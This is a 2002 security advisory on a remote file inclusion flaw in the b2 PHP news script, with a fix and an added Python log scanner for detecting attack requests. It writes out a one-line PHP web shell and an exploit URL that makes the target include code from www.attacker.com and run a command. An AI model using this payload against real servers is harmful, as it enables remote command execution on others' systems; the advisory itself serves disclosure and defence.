b2 php remote command execution

2002-05-06T00:00:00
ID SECURITYVULNS:DOC:2896
Type securityvulns
Reporter Securityvulns
Modified 2002-05-06T00:00:00

Description

Site: www.cafelog.com

Vulnerable:

b2 0.6pre2 and earlier.

B2 is a PHP script which allows webmasters to quickly post news on the front page and lets viewers interact with each other. A bug exists in the scripts which allows an attacker to remotely execute commands.

Exploit:

Taken from /b2-include/b2edit.showposts.php

snippet
<?php
include_once ("b2config.php");
include_once ($b2inc."/b2functions.php");
snippet

But since b2config.php does not exist inside the directory, an attacker can define $b2inc himself.

So if the attacker creates a file called b2functions.php on his server, for example www.attacker.com, and writes the following in it:

<?
system($cmd);
?>

(Note: the attacker's server must not be able to run PHP; it has to serve the file as text.)

he can include the file like this:

http://www.vulnerablehost.com/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls

This would execute the ls command on vulnerablehost.com.
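For spotting requests of this shape in web server logs, the following is an added example and not part of the original advisory: it flags requests to a .php script where a query parameter value is itself a remote URL. The access log format, the sample lines and the host remote.example are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself a remote URL once decoded.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def find_remote_include_attempts(log_lines):
    """Return (client, script_path, param, value) for each request to a
    .php script whose query string carries a remote URL as a value."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith(".php"):
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double encoding.
            decoded = unquote(value)
            if REMOTE_URL_RE.match(decoded):
                hits.append((client, parts.path, name, decoded))
    return hits


# Constructed sample lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/May/2002:10:00:01 +0000] "GET /b2/index.php?p=12 HTTP/1.0" 200 5120',
    '198.51.100.7 - - [06/May/2002:10:02:13 +0000] "GET /b2/b2-include/b2edit.showposts.php?b2inc=http://remote.example&cmd=ls HTTP/1.0" 200 311',
    '198.51.100.7 - - [06/May/2002:10:02:40 +0000] "GET /b2/b2-include/b2edit.showposts.php?b2inc=http%3A%2F%2Fremote.example HTTP/1.0" 200 298',
    '192.0.2.44 - - [06/May/2002:10:05:00 +0000] "GET /images/logo.gif?ref=http://www.example.org HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for hit in find_remote_include_attempts(SAMPLE_LOG):
        print(hit)
```

A hit only shows that a request was made; whether the include succeeded depends on whether b2config.php was present in b2-include at the time.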

Fix:

Copy b2config.php into the b2-include directory

The vendor has been warned, and already released the same fix a few days earlier.